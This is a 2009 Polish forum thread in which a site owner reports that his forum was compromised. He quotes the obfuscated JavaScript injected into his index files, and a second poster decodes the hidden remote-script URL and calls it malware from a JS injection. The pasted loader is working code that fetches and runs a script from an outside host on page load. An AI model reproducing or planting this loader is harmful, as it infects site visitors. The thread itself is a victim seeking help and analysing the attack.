[JavaScript][HTML]Zabezpieczenia, doklejanie kodu html Opcje

[kosma]

Witam!

Otwieram sobie dzisiaj stronę swego forum i strona nie działa - konsternacja...
Zaglądam na serwer, ściągam plik index.php gdyż to w nim sygnalizowany jest błąd i widzę, że na jego końcu doklejony jest nieznany mi kod. W katalogach utworzone zostały pliki index.html i w każdym z nich taki oto kod:

[HTML] pobierz, plaintext 
<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>
[HTML] pobierz, plaintext 

Zauważyłem też że pliki javascript (js) też zostały zmodyfikowane lecz nie wiem o co gdyż zdążyłem je podmienić na właściwe zanim pomyślałem aby zerknąć co też zostało w nich doklejone.
Proszę mi powiedzieć cóż to jest, jak do tego doszło i jak się przed tym zabezpieczyć?

Ten post edytował kosma 28.11.2009, 21:55:10

[darko]

Wygląda na malware, doklejony do zdarzenia document.onload skrypt próbujący wykonać jakiś kod pobierany ze strony:

http://live.com.google.com.baidu-msn.com.b...om/cnet-cnn.com /about-ebay.com/

Jak uzyskałem ten adres?

Kod

<script>
var test = 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@(IMG:style_emoticons/default/exclamation.gif) m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m ($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^';
document.write(test.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));
</script>

Być może Twoja strona jest ofiarą ataku typu js injection, ale aż tak się na tym nie znam. Zapytałbym administratora hostingu na Twoim miejscu, chociaż wątpię, żeby Ci coś konkretnego odpowiedział.

Pozdrawiam.